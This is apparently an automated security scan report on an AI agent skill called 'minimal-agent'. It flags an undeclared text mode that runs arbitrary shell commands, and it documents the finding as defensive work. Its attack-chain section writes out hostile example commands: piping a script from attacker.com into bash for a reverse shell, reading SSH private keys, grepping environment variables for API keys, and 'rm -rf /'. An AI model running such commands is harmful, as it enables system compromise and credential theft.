Skill Trust Decision

minimal-agent

Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.

Install decision first
Source: Manual upload · Scanned: Apr 4, 2026
Files: 3 · Artifacts: 3 · Violations: 4 · Findings: 6
Most direct threat evidence
Critical · RCE
Unrestricted Arbitrary Command Execution via V1 Mode

The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.

scripts/agent.py:459

Why this conclusion was reached

2/4 dimensions flagged
Block
Declared vs actual capability

4 undeclared or violating capabilities were inferred.

Review
Hidden execution and egress

3 lower-risk artifacts were extracted and still need context.

Block
Attack chain and severe findings

The report includes 7 attack-chain steps and 4 severe findings.

Pass
Dependencies and supply chain hygiene

Dependencies are present but no obvious high-risk issue stands out.

Attack Chain

01
Skill marketed as minimal OS control agent with window management and hardware control

deception · SKILL.md:1

02
V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution

deception · SKILL.md:65

03
Attacker forces V1 mode via --text flag or config mode='force_text'

access · scripts/agent.py:444

04
execute_raw_command() passes arbitrary input to shell=True subprocess

Execution · scripts/agent.py:459

05
Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell

Impact · scripts/agent.py:459

06
Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys

Impact · scripts/agent.py:459

07
Attacker executes: 'env | grep API' to harvest credentials

Impact · scripts/agent.py:459

What drove the risk score up

Undeclared arbitrary command execution +35

V1/text mode enables ANY shell command not declared in allowed-tools

Doc-to-code capability mismatch +20

Documentation claims minimal OS control but actual code allows full system access

shell=True subprocess execution +15

execute_raw_command() passes user input directly to shell=True

No parameter validation +5

Command parameters passed directly without sanitization

Most important evidence

Critical · RCE

Unrestricted Arbitrary Command Execution via V1 Mode

The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.

scripts/agent.py:459

Recommendation: Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.

Critical · Doc Mismatch

Documentation Mismatch: Claims Minimal Control But Enables Full System Access

SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.

SKILL.md:67

Recommendation: Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.

High · RCE

Direct Shell Injection via User Input

The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.

scripts/agent.py:459

Recommendation: Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.

High · Priv Escalation

Undeclared Elevated Permissions

The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.

SKILL.md:87

Recommendation: Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.

Medium · Obfuscation

Python venv Path Hardcoded with User Home Directory

Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe', which could be leveraged for persistence or DLL hijacking attacks.

scripts/agent.py:114

Recommendation: Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.

Medium · Credential Theft

Potential Environment Variable Access for API Keys

V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.

scripts/agent.py:459

Recommendation: If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.

Declared capability vs actual capability

Resource       Decision   Declared   Inferred     Evidence
Shell          Pass       WRITE      WRITE        agent.py:run_script() uses subprocess
Filesystem     Pass       WRITE      WRITE        agent.py + V1 mode enables any file operation
Network        Block      READ       READ_WRITE
Database       Block      NONE       WRITE
Environment    Block      NONE       READ
Skill Invoke   Block      NONE       WRITE

Suspicious artifacts and egress

Medium · External URL
https://skillhub.tencent.com/skills/system-controller
SKILL.md:262

Medium · External URL
https://clawhub.ai/wangjiaocheng/system-controller
SKILL.md:271

Medium · External URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip
SKILL.md:275

Dependencies and supply chain

Package      Version   Source   Known vuln   Notes
subprocess   stdlib    Python   No           Standard library only
tomllib      stdlib    Python   No           Standard library only

File composition

3 files · 1255 lines
Python: 1 file · 938 lines
Markdown: 1 file · 293 lines
TOML: 1 file · 24 lines

Files of concern · 2

scripts/agent.py (Python · 938 lines)
Unrestricted Arbitrary Command Execution via V1 Mode · Direct Shell Injection via User Input · Python venv Path Hardcoded with User Home Directory · Potential Environment Variable Access for API Keys

SKILL.md (Markdown · 293 lines)
Documentation Mismatch: Claims Minimal Control But Enables Full System Access · Undeclared Elevated Permissions · https://skillhub.tencent.com/skills/system-controller · https://clawhub.ai/wangjiaocheng/system-controller · https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip

Other files: config.toml

Security positives

V2/function-calling mode provides controlled execution with 55 predefined tools
Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
Configuration allows disabling auto mode fallback to V1
Timeout limits (30s) prevent indefinite command execution